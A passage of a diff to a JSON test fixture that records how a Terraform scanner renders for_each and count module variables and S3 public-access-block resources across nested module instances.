\"nested_tf_module\": null}}}" + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module2[\"e\"]": { + "__address__": "module.s3_module2[0].inner_s3_module2[\"e\"]", + "__end_line__": 11, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + "__start_line__": 7, + "bucket2": [ + true + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module[\"d\"]": { + "__address__": "module.s3_module2[0].inner_s3_module[\"d\"]", + "__end_line__": 5, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], "__start_line__": 1, "bucket2": [ - "var.bucket" + "" + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module2[\"f\"]": { + "__address__": "module.s3_module2[0].inner_s3_module2[\"f\"]", + "__end_line__": 11, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + "__start_line__": 7, + "bucket2": [ + true ], "source": [ "./module2" + ] + } + } + ], + "variable": [ + { + "bucket": { + "__address__": "module.s3_module2[0].bucket", + "__end_line__": 16, + "__start_line__": 14, + "type": [ + "string" + ] + } + }, + { + "bucket2": { + "__address__": "module.s3_module2[0].bucket2", + "__end_line__": 20, + "__start_line__": 18, + "type": [ + "string" + ] + } + } + ] + }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": { + "module": [ + { + "inner_s3_module[\"c\"]": { + "__address__": "module.s3_module2[1].inner_s3_module[\"c\"]", + "__end_line__": 5, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], - "__address__": "module.s3_module2[0].inner_s3_module[\"c\"]" + "__start_line__": 1, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ] } }, { "inner_s3_module2[\"e\"]": { + "__address__": "module.s3_module2[1].inner_s3_module2[\"e\"]", "__end_line__": 11, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], "__start_line__": 7, "bucket2": [ - "var.bucket2" + true ], "source": [ "./module2" - ], - "__address__": "module.s3_module2[0].inner_s3_module2[\"e\"]" + ] } }, { "inner_s3_module[\"d\"]": { + "__address__": "module.s3_module2[1].inner_s3_module[\"d\"]", "__end_line__": 5, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], "__start_line__": 1, "bucket2": [ - "var.bucket" + "" ], "source": [ "./module2" - ], - "__address__": "module.s3_module2[0].inner_s3_module[\"d\"]" + ] } }, { "inner_s3_module2[\"f\"]": { + "__address__": "module.s3_module2[1].inner_s3_module2[\"f\"]", "__end_line__": 11, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], "__start_line__": 7, "bucket2": [ - "var.bucket2" + true ], "source": [ "./module2" - ], - "__address__": "module.s3_module2[0].inner_s3_module2[\"f\"]" + ] } } ], "variable": [ { "bucket": { + "__address__": "module.s3_module2[1].bucket", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[0].bucket" + ] } }, { "bucket2": { + "__address__": "module.s3_module2[1].bucket2", "__end_line__": 20, "__start_line__": 18, "type": [ "string" - ], - "__address__": "module.s3_module2[0].bucket2" + ] } } ] @@ -280,17 +460,19 @@ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2" + false + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -299,15 +481,14 @@ true ], "bucket": [ - "var.bucket2" + false ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -315,30 +496,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2" + false + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -347,15 +530,14 @@ true ], "bucket": [ - "var.bucket2" + false ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -363,30 +545,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -395,15 +579,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -411,30 +594,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -443,15 +628,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -459,147 +643,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/variable.tf\", \"tf_source_modules\": null}": { - "variable": [ - { - "count_var": { - "__end_line__": 4, - "__start_line__": 2, - "default": [ - 2 - ], - "__address__": "count_var" - } - }, - { - "foreach_var": { - "__end_line__": 8, - "__start_line__": 6, - "default": [ - [ - "a", - "b" - ] - ], - "__address__": "foreach_var" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": { - "module": [ - { - "inner_s3_module[\"c\"]": { - "__end_line__": 5, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module[\"c\"]" - } - }, - { - "inner_s3_module2[\"e\"]": { - "__end_line__": 11, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 7, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"e\"]" - } - }, - { - "inner_s3_module[\"d\"]": { - "__end_line__": 5, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module[\"d\"]" - } - }, - { - "inner_s3_module2[\"f\"]": { - "__end_line__": 11, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 7, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"f\"]" - } - } - ], - "variable": [ - { - "bucket": { - "__end_line__": 16, - "__start_line__": 14, - "type": [ - "string" - ], - "__address__": "module.s3_module[\"b\"].bucket" - } - }, - { - "bucket2": { - "__end_line__": 20, - "__start_line__": 18, - "type": [ - "string" - ], - "__address__": "module.s3_module[\"b\"].bucket2" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2" + false + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -608,15 +677,14 @@ true ], "bucket": [ - "var.bucket2" + false ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -624,30 +692,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2" + false + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -656,15 +726,14 @@ true ], "bucket": [ - "var.bucket2" + false ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -672,120 +741,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": { - "module": [ - { - "inner_s3_module[\"c\"]": { - "__end_line__": 5, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module[\"c\"]" - } - }, - { - "inner_s3_module2[\"e\"]": { - "__end_line__": 11, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 7, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module2[\"e\"]" - } - }, - { - "inner_s3_module[\"d\"]": { - "__end_line__": 5, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module[\"d\"]" - } - }, - { - "inner_s3_module2[\"f\"]": { - "__end_line__": 11, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 7, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module2[\"f\"]" - } - } - ], - "variable": [ - { - "bucket": { - "__end_line__": 16, - "__start_line__": 14, - "type": [ - "string" - ], - "__address__": "module.s3_module2[1].bucket" - } - }, - { - "bucket2": { - "__end_line__": 20, - "__start_line__": 18, - "type": [ - "string" - ], - "__address__": "module.s3_module2[1].bucket2" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -794,15 +775,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -810,30 +790,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": 